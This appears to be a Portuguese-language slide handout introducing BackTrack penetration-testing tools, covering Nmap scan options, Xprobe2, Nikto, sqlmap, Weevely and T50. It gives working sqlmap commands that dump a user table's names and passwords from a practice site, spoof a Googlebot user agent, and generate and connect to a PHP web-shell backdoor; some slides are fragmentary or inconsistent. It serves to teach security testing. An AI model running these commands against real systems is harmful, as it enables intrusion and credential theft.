Escolar Documentos
Profissional Documentos
Cultura Documentos
Fonte: http://pt.wikipedia.org/wiki/BackTrack
Backtrack:
Eleé a fusão de duas distribuições que eram bem
conhecidas na época:
- Whax e Auditor Security Collection
Eleito
em 2006 como a Distribuição Live de
Segurança número 1º em sua categoria
Ubuntu desatualizado
Nmap:
-sT
TCP connect() scan: É a técnica mais básica de
TCP scanning. É utilizada a chamada de sistema
(system call) “connect()” que envia um sinal as
portas ativas. Caso a porta esteja aberta recebe
como resposta “connect()”. É um dos scan mais
rápidos, porém fácil de ser detectado
-sU
UDP scan: Este método é utilizado para determinar
qual porta UDP está aberta em um host. A técnica
consiste em enviar um pacote UDP de 0 byte para
cada portado host.
Se for recebido uma mensagem ICMP “port
unreachable” então a porta está fechada, senão a
porta pode estar aberta. Para variar um pouco, a
Microsoft ignorou a sugestão da RFC e com isso a
varredura de máquinas Windows é muito rápida.
-O
Ativa a identificação do host remoto via TCP/IP. Irá
apresentar versão do Sistema
Operacional e tempo ativo.
Ex.: nmap -O alvo
-v
Modo verbose. Mostra tudo o que está se
passando.
Ex.: nmap -v alvo
Nmap:
-F
Procura pelas portas que estão no /etc/services.
Método mais rápido, porém não procurar por todas
as portas.
Ex.: nmap -F alvo
-P0
Não tenta pingar o host antes de iniciar a
varredura. Isto permite varrer alvos que bloqueiam
ICMP “echo request (ou responses)” através de
firewall.
Ex.: nmap -P0 alvo
Xprobe2:
Xprobe2 analisa banners de sistemas
operacionais, comparando com um banco de
dados interno, onde compara-os e informa o S.O.
utilizado e a versão do mesmo.
Exemplo:
xprobe2 [host-name]
xprobe2 <ip>
Nikto :
Nikto é um script Perl usado para testar a
segurança de seu servidor web. Ele
faz a varredura em servidores Apache tanto em
busca de vulnerabilidades, quanto de falhas de
configuração.
Local: /pentest/database/sqlmap
String: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" – [opções]
SQL Map :
--help
Mostra as opções do SQLMAP
--current-db
Apresenta o banco de dados atual Exemplo: ./sqlmap.py --url
"http://testphp.vulnweb.com/listproducts.php?cat=1" --current-db
--banner
Pega o Banner do DBMS
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?
cat=1" -b
--dbs
Lista os bancos de dados do DBMS Exemplo: ./sqlmap.py --url
"http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs
SQL Map :
--tables
Apresenta as tabelas do banco selecionado Exemplo: ./sqlmap.py --url
"http://testphp.vulnweb.com/listproducts.php?cat=1"
-D acuart --tables
--columns
Apresenta as colunas da tabela selecionada
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?
cat=1"
-D acuart -T users --columns
--dump
Extrai as informações da colunas selecionadas Exemplo: ./sqlmap.py --url
"http://testphp.vulnweb.com/listproducts.php?cat=1"
-D acuart -T users -C 'uname,pass' --dump
SQL Map :
--current-user
Apresenta o usuário ao qual a página está usando para se conectar ao banco
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?
cat=1" --current-user
--is-dba
Verifica se o usuário atual é administrador do Banco
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?
cat=1" --is-dba
--users
Enumera todos os usuários
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?
cat=1" --users
--search
Varre o banco atrás do que você procura, pode ser um banco, tabela ou
coluna
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?
cat=1" --search –C ‘pass’
SQL Map :
--user-agent
Altera o nome do user Agent durante o ataque Exemplo: ./sqlmap.py --url
"http://testphp.vulnweb.com/listproducts.php?cat=1"
--user-agent=“Mozilla/5.0 (compatible; Googlebot/2.1;
+http://www.google.com/bot.html)”
--level=1-5
Seta o nível de performance que ele irá utilizar para efetuar a varredura
--risk=1-3
Seta o nível de risco de performance que o sqlmap efetuará para a
varredura
Weevely:
Local: /pentest/backdoors/web/weevely
Uso:
Gerando o Backdoor:
./weevely generate teste/tmp/back.php
# Cria um backdoor com a senha eSecurity na
pasta /tmp
./weevelyhttp://www.sitevul.com/back.php teste
# Acessa a shell utilizando a senha teste
DoS:
T50 ferramenta de desenvolvida por um brasileiro,
Nelson Brito, capaz de fazer ataques DoS e DDoS
usando o conceito de stress testing:
Local: /pentest/passwords/john
Ferramenta: Unshadow